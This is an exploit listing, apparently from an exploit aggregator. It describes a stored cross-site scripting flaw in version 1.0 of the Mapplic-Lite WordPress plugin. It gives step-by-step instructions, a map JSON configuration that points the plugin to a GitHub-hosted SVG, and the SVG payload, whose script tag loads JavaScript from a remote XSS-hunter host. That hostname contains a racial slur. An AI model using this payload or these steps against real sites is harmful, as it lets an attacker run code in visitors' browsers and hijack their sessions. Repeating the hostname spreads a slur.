Share
## https://sploitus.com/exploit?id=PACKETSTORM:161919
#Title : Mapplic-Lite Wordpress Plugins Stored XSS Injection via SSRF  
#Date : 22/03/2021  
#Author : Eagle Eye  
#Download : https://wordpress.org/plugins/mapplic-lite/  
#Vendor Homepage : https://mapplic.com/  
#Version Affected : Version 1.0  
#Tested on : Google Chrome  
#XSS Vuln from add/edit Map and bypass with host raw.githubusercontent.com  
  
#1.Login as user  
#2.Add Add/Edit Map  
- [From Add]Enter github url with payload at "Map File (required)"  
- [From Edit]Click raw and enter github url with payload  
  
#Example [From edit]  
{"mapwidth":"100","mapheight":"100","minimap":false,"clearbutton":true,"zoombuttons":true,"sidebar":false,  
"search":false,"hovertip":true,"mousewheel":true,"fullscreen":false,"deeplinking":true,"mapfill":false,  
"zoom":true,"alphabetic":false,"zoomlimit":"3","action":"tooltip","categories":[],  
"levels":[{"id":"my-map","title":"My Map","map":"  
https://raw.githubusercontent.com/Aizat197/xss_test/main/xss.svg  
","minimap":"","locations":[]}]}  
  
#Payload  
<svg version="1.1" id="mapplic-usa" xmlns="http://www.w3.org/2000/svg"  
xmlns:xlink="http://www.w3.org/1999/xlink" x="0px"  
y="0px" width="960px" height="600px" viewBox="0 0 960 600"  
enable-background="new 0 0 960 600" xml:space="preserve">  
<script src=https://meownigga.xss.ht></script>  
</svg>